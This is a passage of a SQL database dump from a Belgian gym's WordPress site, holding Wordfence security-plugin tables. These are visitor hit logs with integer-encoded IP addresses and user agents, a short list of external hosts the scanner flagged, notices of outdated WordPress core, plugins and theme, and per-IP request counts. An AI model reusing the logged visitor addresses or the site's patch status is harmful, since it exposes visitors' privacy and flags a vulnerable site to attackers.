(78846, 1565356309.419170, 3576813415, 0, 0, 0, 0, 0, 'http://www2.crosstrainingcenter.be/le-cross-training/', 'http://www2.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),
(78847, 1565412916.899256, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78848, 1565412917.365618, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78849, 1565441369.319283, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78850, 1565488544.098815, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78851, 1565531890.464004, 1123631282, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78852, 1565966141.256775, 1123633942, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78853, 1565975415.868200, 1123633942, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78854, 1565976920.174769, 1123633942, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78855, 1565980240.402657, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78856, 1565980241.006997, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78857, 1565980255.711997, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78858, 1565980256.315830, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78859, 1565980256.948537, 3746233170, 0, 1, 0, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78860, 1565980275.771314, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78861, 1565980276.364341, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78862, 1565980281.954341, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78863, 1565980282.535154, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78864, 1565980283.382193, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78865, 1565980283.962651, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78866, 1565980284.597125, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78867, 1565980285.205870, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78868, 1565980285.882920, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78869, 1565980286.532611, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78870, 1565980287.177010, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78871, 1565980287.780552, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78872, 1565980288.437149, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78873, 1565980289.139513, 3746233170, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', 'www2.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(78874, 1566024059.620276, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78875, 1566064877.081272, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78876, 1566064877.583031, 1123634950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78877, 1566088929.408696, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78878, 1566097044.204459, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78879, 1566139909.896516, 1123631564, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78880, 1566173718.146972, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78881, 1566173718.661471, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78882, 1566208133.665544, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78883, 1566243470.498581, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78884, 1566380951.453861, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78885, 1566380951.881681, 1123631814, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78886, 1566482799.145291, 1123631270, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78887, 1566834221.392189, 1532393715, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.com/', 'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J600FN Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36'),
(78888, 1566834223.611374, 1532393715, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J600FN Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36');

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfHoover`
--

CREATE TABLE `www2_wfHoover` (
  `id` int(10) UNSIGNED NOT NULL,
  `owner` text,
  `host` text,
  `path` text,
  `hostKey` binary(4) DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_wfHoover`
--

INSERT INTO `www2_wfHoover` (`id`, `owner`, `host`, `path`, `hostKey`) VALUES
(1, '1', 'fjiauool.com', '/', 0x0c2e4e02),
(2, '1', 'stpicks.com', '/27', 0x2ac36238),
(3, '1', 'pcgroup.com.uy', '/15', 0x296f4be1),
(4, '1', 'pcgroup.com.uy', '/15', 0xbe7f7f70),
(5, '1', 'pcgroup.com.uy', '/2a', 0x296f4be1),
(6, '1', 'pcgroup.com.uy', '/2a', 0xbe7f7f70),
(7, '1', '81.171.81.55', '/', 0x2b03814e);

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfIssues`
--

CREATE TABLE `www2_wfIssues` (
  `id` int(10) UNSIGNED NOT NULL,
  `time` int(10) UNSIGNED NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) UNSIGNED NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text,
  `data` text
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_wfIssues`
--

INSERT INTO `www2_wfIssues` (`id`, `time`, `status`, `type`, `severity`, `ignoreP`, `ignoreC`, `shortMsg`, `longMsg`, `data`) VALUES
(11220, 1492320260, 'new', 'wfPluginUpgrade', 1, '251c4825d966f36385a37786514c8853', '251c4825d966f36385a37786514c8853', 'The Plugin \"Slideshow Manager\" needs an upgrade.', 'You need to upgrade \"Slideshow Manager\" to the newest version to ensure you have any security fixes the developer has released.', 'a:12:{s:4:\"Name\";s:17:\"Slideshow Manager\";s:9:\"PluginURI\";s:34:\"http://rasmus.pw/slideshow-manager\";s:7:\"Version\";s:5:\"2.1.2\";s:11:\"Description\";s:125:\"Slideshow Manager for Wordpress <cite>By <a href=\"http://rasmus.pw\" title=\"Visit author homepage\">Rasmus Johanson</a>.</cite>\";s:6:\"Author\";s:76:\"<a href=\"http://rasmus.pw\" title=\"Visit author homepage\">Rasmus Johanson</a>\";s:9:\"AuthorURI\";s:16:\"http://rasmus.pw\";s:10:\"TextDomain\";s:0:\"\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:96:\"<a href=\"http://rasmus.pw/slideshow-manager\" title=\"Visit plugin homepage\">Slideshow Manager</a>\";s:10:\"AuthorName\";s:15:\"Rasmus Johanson\";s:10:\"newVersion\";s:5:\"2.1.3\";}'),
(11221, 1492320260, 'new', 'wfThemeUpgrade', 1, 'c6c751f2716d4a026208678db23e15f4', 'c6c751f2716d4a026208678db23e15f4', 'The Theme \"Figero\" needs an upgrade.', 'You need to upgrade \"Figero\" to the newest version to ensure you have any security fixes the developer has released.', 'a:5:{s:10:\"newVersion\";s:5:\"1.5.6\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/figero.1.5.6.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/figero/\";s:4:\"name\";s:6:\"Figero\";s:7:\"version\";s:5:\"1.5.1\";}'),
(11218, 1492320260, 'new', 'wfPluginUpgrade', 1, '0647b9cfc99d721a9bfa1a6c42f780ec', '0647b9cfc99d721a9bfa1a6c42f780ec', 'The Plugin \"Display widgets\" needs an upgrade.', 'You need to upgrade \"Display widgets\" to the newest version to ensure you have any security fixes the developer has released.', 'a:12:{s:4:\"Name\";s:15:\"Display widgets\";s:9:\"PluginURI\";s:38:\"http://strategy11.com/display-widgets/\";s:7:\"Version\";s:4:\"1.24\";s:11:\"Description\";s:155:\"Adds checkboxes to each widget to show or hide on site pages. <cite>By <a href=\"http://strategy11.com\" title=\"Visit author homepage\">Strategy11</a>.</cite>\";s:6:\"Author\";s:76:\"<a href=\"http://strategy11.com\" title=\"Visit author homepage\">Strategy11</a>\";s:9:\"AuthorURI\";s:21:\"http://strategy11.com\";s:10:\"TextDomain\";s:0:\"\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:98:\"<a href=\"http://strategy11.com/display-widgets/\" title=\"Visit plugin homepage\">Display widgets</a>\";s:10:\"AuthorName\";s:10:\"Strategy11\";s:10:\"newVersion\";s:4:\"2.05\";}'),
(11219, 1492320260, 'new', 'wfPluginUpgrade', 1, '25131a8272a928df146fde866da7d216', '25131a8272a928df146fde866da7d216', 'The Plugin \"Google Analyticator\" needs an upgrade.', 'You need to upgrade \"Google Analyticator\" to the newest version to ensure you have any security fixes the developer has released.', 'a:12:{s:4:\"Name\";s:19:\"Google Analyticator\";s:9:\"PluginURI\";s:128:\"http://www.videousermanuals.com/google-analyticator/?utm_campaign=analyticator&#038;utm_medium=plugin&#038;utm_source=readme-txt\";s:7:\"Version\";s:5:\"6.4.5\";s:11:\"Description\";s:425:\"Adds the necessary JavaScript code to enable <a href=\"http://www.google.com/analytics/\">Google&#8217;s Analytics</a>. After enabling this plugin you need to authenticate with Google, then select your domain and you&#8217;re set. <cite>By <a href=\"http://www.videousermanuals.com/?utm_campaign=analyticator&#038;utm_medium=plugin&#038;utm_source=readme-txt\" title=\"Visit author homepage\">Video User Manuals Pty Ltd</a>.</cite>\";s:6:\"Author\";s:179:\"<a href=\"http://www.videousermanuals.com/?utm_campaign=analyticator&#038;utm_medium=plugin&#038;utm_source=readme-txt\" title=\"Visit author homepage\">Video User Manuals Pty Ltd</a>\";s:9:\"AuthorURI\";s:108:\"http://www.videousermanuals.com/?utm_campaign=analyticator&#038;utm_medium=plugin&#038;utm_source=readme-txt\";s:10:\"TextDomain\";s:19:\"google-analyticator\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:192:\"<a href=\"http://www.videousermanuals.com/google-analyticator/?utm_campaign=analyticator&#038;utm_medium=plugin&#038;utm_source=readme-txt\" title=\"Visit plugin homepage\">Google Analyticator</a>\";s:10:\"AuthorName\";s:26:\"Video User Manuals Pty Ltd\";s:10:\"newVersion\";s:5:\"6.5.3\";}'),
(11216, 1492320260, 'new', 'wfUpgrade', 1, '0ae1093452ea46624c9b7e527c789fa7', '0ae1093452ea46624c9b7e527c789fa7', 'Your WordPress version is out of date', 'WordPress version 4.7.3 is now available. Please upgrade immediately to get the latest security updates from WordPress.', 'a:2:{s:14:\"currentVersion\";s:6:\"3.7.19\";s:10:\"newVersion\";s:5:\"4.7.3\";}'),
(11217, 1492320260, 'new', 'wfPluginUpgrade', 1, 'f26b251a2acbfbd93e6583d1f1386c75', 'f26b251a2acbfbd93e6583d1f1386c75', 'The Plugin \"Akismet\" needs an upgrade.', 'You need to upgrade \"Akismet\" to the newest version to ensure you have any security fixes the developer has released.', 'a:12:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:31:\"http://akismet.com/?return=true\";s:7:\"Version\";s:6:\"2.5.10\";s:11:\"Description\";s:558:\"Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the &#8220;Activate&#8221; link to the left of this description, 2) <a href=\"http://akismet.com/get/?return=true\">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key. <cite>By <a href=\"http://automattic.com/wordpress-plugins/\" title=\"Visit author homepage\">Automattic</a>.</cite>\";s:6:\"Author\";s:95:\"<a href=\"http://automattic.com/wordpress-plugins/\" title=\"Visit author homepage\">Automattic</a>\";s:9:\"AuthorURI\";s:40:\"http://automattic.com/wordpress-plugins/\";s:10:\"TextDomain\";s:0:\"\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:83:\"<a href=\"http://akismet.com/?return=true\" title=\"Visit plugin homepage\">Akismet</a>\";s:10:\"AuthorName\";s:10:\"Automattic\";s:10:\"newVersion\";s:3:\"3.3\";}');

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfLeechers`
--

CREATE TABLE `www2_wfLeechers` (
  `eMin` int(10) UNSIGNED NOT NULL,
  `IP` int(10) UNSIGNED NOT NULL,
  `hits` int(10) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--
-- Déchargement des données de la table `www2_wfLeechers`
--

INSERT INTO `www2_wfLeechers` (`eMin`, `IP`, `hits`) VALUES
(24886298, 1338305741, 1),
(24886258, 1123632584, 1),
(24886386, 1123632437, 1),
(24886385, 1123632437, 1),
(24886380, 1123632437, 1),
(24886236, 3024883466, 1),
(24886374, 1123632437, 1),
(24886236, 3024883608, 1),
(24888172, 3267064321, 1),
(24888158, 3429212575, 1),
(24888081, 1837156116, 1),
(24886367, 1123632437, 1),
(24886361, 1123632437, 1),
(24886355, 1123632437, 1),
(24886347, 1123632437, 1),
(24886236, 3024883476, 1),
(24886154, 1338305741, 1),
(24886072, 1338305741, 1),
(24886018, 1338305741, 1),
(24885984, 1123632438, 1),
(24881240, 758618229, 9),
(24886341, 1123632437, 1),
(24886335, 1123632437, 1),
(24887779, 3492536660, 5),
(24887778, 3492536660, 2),
(24887766, 3392025247, 1),
(24887687, 2366158596, 1),
(24887687, 2996485408, 1),
(24886328, 1123632437, 1),
(24885446, 2661914122, 1),
(24881173, 1463941259, 2),
(24885400, 2783008832, 2),
(24885589, 1374841142, 2),
(24885487, 3342489294, 3),
(24885486, 3342489294, 1),
(24887687, 2366148291, 1),
(24887639, 2637637525, 1),
(24887580, 2760155479, 1),
(24887334, 2297635928, 4),
(24884955, 1123635091, 1),
(24886258, 1123632437, 1),
(24881173, 3024883472, 1),
(24881172, 1463941259, 1),
(24881171, 1463941259, 1),
(24881170, 1463941259, 1),
(24881169, 1463941259, 1),
(24885819, 1837165719, 1),
(24885399, 2783008832, 2),
(24881168, 1463941259, 1),
(24885269, 1338305741, 1),
(24885775, 3475901839, 1),
(24885774, 676177849, 2),
(24885975, 1338305741, 1),
(24885974, 1374841142, 1),
(24887333, 2297635928, 5),
(24887332, 2297635928, 3),
(24887291, 1123632454, 1),
(24887216, 2637637385, 1),
(24887207, 3641698364, 2),
(24887206, 3641698364, 2),
(24887205, 3641698364, 1),
(24885895, 2637637525, 1),
(24887192, 1837165719, 1),
(24887186, 1599420426, 2),
(24887180, 2760119799, 1),
(24887155, 786801766, 1),
(24887069, 876167319, 2),
(24887055, 3584051034, 1),
(24885830, 2366148270, 1),
(24887026, 1123632437, 1),
(24885830, 2996485408, 1),
(24885830, 2366158596, 1),
(24885264, 2499535434, 1),
(24887000, 1837382274, 1),
(24886950, 2509959393, 1),
(24886887, 1837486295, 1),
(24886878, 1837486295, 2),
(24886860, 1837165719, 1),
(24886809, 3242976508, 1),
(24886796, 1123632437, 1),
(24886665, 1123632437, 1),
(24886555, 772029058, 2),
(24886516, 1123632437, 1),
(24886516, 2637637525, 1),
(24886500, 2956707729, 1),
(24886496, 676177832, 1),
(24885088, 2499535434, 1),
(24886476, 1123632437, 1),
(24886460, 676177832, 1),
(24886415, 1123632437, 2),
(24886409, 1123632437, 1),
(24886404, 1123632437, 1),
(24886398, 1123632437, 2),
(24884117, 3587417960, 1),
(24884055, 3587417960, 1),
(24881010, 1123632454, 1),
(24885762, 3585419230, 1),
(24886284, 1123632437, 1),
(24885752, 3585419230, 1),
(24885751, 3585419230, 1),
(24885745, 1338305741, 1),
(24885685, 3639886562, 1),
(24885680, 3639886562, 1),
(24885671, 2509960529, 1),
(24885590, 1338305741, 1),
(24884052, 3587417960, 1),
(24884051, 3587417960, 1),
(24881000, 1123632454, 1),
(24884050, 3587417960, 1),
(24885031, 96753435, 1),
(24880986, 2297635928, 5),
(24883910, 2297635928, 5),
(24883907, 2297635928, 1),
(24885030, 3652617287, 1),
(24883906, 2297635928, 2),
(24883905, 1837933865, 1),
(24883902, 1837933865, 1),
(24883902, 2297635928, 2),
(24883842, 400891747, 1),
(24883733, 676177850, 1),
(24883608, 632890059, 1),
(24883580, 1538649748, 1),
(24881297, 1837165719, 1),
(24883574, 1538649748, 1),
(24883561, 1837165719, 1),
(24884945, 520974917, 1),
(24884943, 1837858581, 1),
(24880985, 2297635928, 5),
(24880984, 2297635928, 3),
(24880888, 1123632454, 1),
(24880826, 1123632454, 2),
(24880799, 2655380742, 3),
(24884657, 2637637586, 1),
(24884455, 676177817, 2),
(24880798, 2655380742, 7),
(24880766, 1123632454, 1),
(24880736, 2637637570, 2),
(24880719, 1837522582, 1),
(24880718, 1837522582, 2),
(24880650, 1123633542, 1),
(24880622, 3475901863, 1),
(24884424, 3024883592, 1),
(24884399, 1439296427, 1),
(24884381, 3475901711, 1),
(24884348, 3639886562, 1),
(24884342, 3639886562, 1),
(24884167, 1078646641, 1),
(24882731, 1123631302, 1),
(24882705, 676177685, 1),
(24882660, 1123631302, 1),
(24882617, 2637637575, 1),
(24882615, 1123631302, 2),
(24882615, 1123631176, 1),
(24883551, 2954838202, 1),
(24883516, 1837165719, 1),
(24883236, 2499535434, 1),
(24883113, 1123631302, 1),
(24883070, 2499535434, 1),
(24883044, 2996488207, 1),
(24883013, 676177832, 1),
(24882918, 676177687, 2),
(24882910, 1374841142, 2),
(24882908, 1605828477, 1),
(24882895, 2071806885, 1),
(24882895, 2071807790, 1),
(24880584, 1123633542, 1),
(24880523, 1123633542, 1),
(24880523, 1123633430, 1),
(24882883, 1123631302, 1),
(24882854, 1837165719, 1),
(24882603, 1567842252, 1),
(24882399, 2655379749, 11),
(24882387, 1123631313, 1),
(24882313, 1834499396, 1),
(24882287, 676177833, 2),
(24882263, 1439284665, 1),
(24882262, 1439284665, 3),
(24881774, 2499535434, 1),
(24880514, 2499535434, 1),
(24880394, 2499535434, 1),
(24880301, 1123633542, 2),
(24880230, 3652617279, 1),
(24880205, 2637637570, 1),
(24881714, 3639886562, 1),
(24881703, 3639886562, 1),
(24881653, 2499535434, 1),
(24881637, 2366158866, 1),
(24881566, 676177851, 1),
(24881566, 1796538632, 1),
(24881492, 1123632454, 1),
(24881386, 1837165719, 1),
(24881382, 3024883472, 1),
(24881341, 1159648650, 3),
(24880164, 635281730, 1),
(24880151, 1588718379, 1),
(24880140, 2990433199, 1),
(24880135, 3423455625, 1),
(24880135, 1806877237, 1),
(24880110, 676177817, 1),
(24880098, 3024883463, 1),
(24882766, 1123631302, 1),
(24882762, 1837165719, 1),
(24880045, 693628318, 3),
(24880032, 1837165719, 1),
(24888205, 2995859706, 1),
(24888419, 676177811, 1),
(24888419, 2637637595, 1),
(24888420, 1837953980, 1),
(24888422, 3475901820, 1),
(24888560, 1049233326, 1),
(24888605, 1837857107, 1),
(24888772, 1374841142, 2),
(24888877, 2905398467, 1),
(24888948, 2996488257, 1),
(24889016, 1833311020, 1),
(24889029, 2499535434, 1),
(24889194, 2499535434, 1),
(24889501, 3339975108, 3),
(24889501, 3234106972, 3),
(24889577, 1538649748, 2),
(24889684, 1375112542, 1),
(24889722, 3323226906, 1),
(24889861, 629871318, 2),
(24889871, 629871318, 1),
(24889876, 629871318, 1),
(24889880, 629871318, 1),
(24889940, 3587417960, 1),
(24889941, 3587417960, 2),
(24890187, 1374824443, 1),
(24890198, 2499535434, 1),
(24890294, 2509962920, 1),
(24890295, 2509962920, 2),
(24890297, 2509962920, 1),
(24890297, 2954838202, 1),
(24890318, 2499535434, 1),
(24890361, 2509963089, 1),
(24890427, 3024883471, 1),
(24890708, 1540531433, 1),
(24890890, 3162553515, 1),
(24891065, 1538506743, 1),
(24891066, 1538506743, 1),
(24891068, 1538506743, 2),
(24891158, 3107604753, 2),
(24891184, 2760155453, 1),
(24891184, 96753435, 1),
(24891313, 1123631646, 1),
(24891324, 2366148252, 1),
(24891324, 2366148120, 1),
(24891324, 2996485381, 1),
(24891324, 2996488207, 1),
(24891353, 1123631762, 1),
(24891353, 1123631630, 2),
(24891509, 1374841142, 2),
(24891528, 2297635928, 2),
(24891529, 2297635928, 6),
(24891530, 2297635928, 4),
(24891531, 2297635928, 1),
(24891532, 2297635928, 1),
(24891548, 2637637379, 1),
(24891550, 2637637511, 1),
(24891563, 1538461206, 1),
(24891564, 1375112542, 1),
(24891684, 1123634273, 1),
(24891806, 1123634273, 1),
(24891832, 1374774657, 2),
(24891875, 1450079886, 2),
(24891913, 3024883603, 1),
(24891958, 1123631630, 1),
(24891974, 1123634273, 1),
(24891994, 1123634273, 1),
(24892055, 1123634273, 1),
(24892218, 1123631630, 1),
(24892221, 3475901821, 1),
(24892228, 2637637474, 1),
(24892270, 676177816, 2),
(24892332, 2637637590, 1),
(24892787, 3024883468, 1),
(24892829, 3657084251, 1),
(24892848, 1375112542, 1),
(24892854, 1741628807, 1),
(24892994, 1375112542, 1),
(24893150, 3657084251, 1),
(24893187, 1572356835, 1),
(24893298, 2637637384, 2),
(24893305, 3657084251, 1),
(24893535, 1338306177, 1),
(24893578, 1338306177, 1),
(24893632, 1338306177, 1),
(24893696, 1538649748, 1),
(24893714, 1338306177, 1),
(24893853, 1834495119, 1),
(24893854, 1834495119, 3),
(24893858, 1338306177, 1),
(24893916, 3024883597, 1),
(24893962, 1538649748, 1),
(24893971, 1837906296, 1),
(24894018, 676177808, 2),
(24894050, 1355294142, 1),
(24894129, 1375112542, 1),
(24894137, 1355389698, 2),
(24894161, 2071806885, 1),
(24894161, 3702862679, 1),
(24894164, 1375112542, 1),
